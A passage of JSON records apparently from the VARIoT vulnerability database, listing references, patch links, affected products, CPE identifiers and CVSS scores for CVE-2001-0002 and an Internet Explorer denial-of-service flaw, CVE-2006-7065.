"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"id": "VAR-200107-0045",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-07-04T22:18:25.097000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS01-015",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms01-015.mspx"
},
{
"title": "MS01-015",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms01-015.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=825750"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=827363"
},
{
"trust": 1.6,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 1.6,
"url": "http://cgi.nessus.org/plugins/dump.php3?id=11835"
},
{
"trust": 1.6,
"url": "http://www.iss.net/support/product_utilities/xfrpcss.php"
},
{
"trust": 1.6,
"url": "http://www.ntbugtraq.com/dcomrpc.asp"
},
{
"trust": 1.6,
"url": "http://securecomputing.stanford.edu/alerts/win-rpc-10sept2003.html"
},
{
"trust": 1.6,
"url": "http://www.coresecurity.com/common/showdoc.php?idx=393\u0026idxseccion=10"
},
{
"trust": 1.6,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/ms01-015"
},
{
"trust": 1.6,
"url": "http://www.guninski.com/chmtempmain.html"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a920"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/7823"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/2456"
},
{
"trust": 1.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/5567"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20030910.html"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/tools/rpcdcom.html"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.nsfocus.com/english/homepage/research/0306.htm"
},
{
"trust": 0.8,
"url": "http://www.lac.co.jp/security/english/snsadv_e/68_e.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/object.asp"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/12970"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/7806"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2001-0002"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2001-0002"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/2633"
},
{
"trust": 0.2,
"url": "http://www.cert.org/"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.2,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/209807"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/jarl-5rfqqz."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/602204"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"date": "2003-09-29T22:44:34",
"db": "PACKETSTORM",
"id": "31735"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2001-07-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"date": "2001-07-21T04:00:00",
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2005-08-11T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"date": "2021-07-23T12:18:31.047000",
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
}
}
VAR-200703-0270
Vulnerability from variot - Updated: 2023-12-18 13:54
Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. Microsoft Internet Explorer is prone to a denial-of-service vulnerability when handling malicious HTML files. Successfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200703-0270",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "network camera server vb101",
"scope": null,
"trust": 1.4,
"vendor": "canon",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6.0 and 7.0"
},
{
"model": "internet explorer beta3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer beta2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windowsxp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:microsoft_windows_server_2003_sp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:*:vista:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:beta_2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thomas Pollet is credited with the discovery of this issue.",
"sources": [
{
"db": "BID",
"id": "19364"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.9
},
"cve": "CVE-2006-7065",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-7065",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-23173",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-7065",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200703-042",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-23173",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. Microsoft Internet Explorer is prone to a denial-of-service vulnerability when handling malicious HTML files. \nSuccessfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "VULHUB",
"id": "VHN-23173"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-23173",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-7065",
"trust": 2.8
},
{
"db": "BID",
"id": "19364",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "28343",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-81914",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-23173",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"id": "VAR-200703-0270",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:54:04.827000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://canon.jp/"
},
{
